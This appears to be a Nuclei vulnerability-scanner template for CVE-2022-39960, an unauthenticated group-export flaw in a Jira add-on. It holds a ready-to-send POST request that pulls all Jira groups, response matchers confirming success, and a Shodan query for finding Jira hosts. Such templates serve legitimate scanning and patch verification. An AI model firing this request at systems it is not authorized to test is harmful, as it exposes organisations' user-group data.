nuclei-templates/cves/2022/CVE-2022-39960.yaml

51 lines
1.5 KiB
YAML

id: CVE-2022-39960
info:
name: Atlassian Jira addon Netic Group Export < 1.0.3 - Unauthenticated Access
author: For3stCo1d
severity: medium
description: |
The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
reference:
- https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
- https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
- https://nvd.nist.gov/vuln/detail/CVE-2022-39960
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-39960
cwe-id: CWE-862
metadata:
shodan-query: http.component:"Atlassian Jira"
verified: "true"
tags: cve,cve2022,atlassian,jira,netic,unauth
requests:
- raw:
- |
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groupexport_searchstring=&groupexport_download=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jiraGroupObjects"'
- '"groupName"'
condition: and
- type: word
part: header
words:
- "attachment"
- "jira-group-export"
condition: and
- type: status
status:
- 200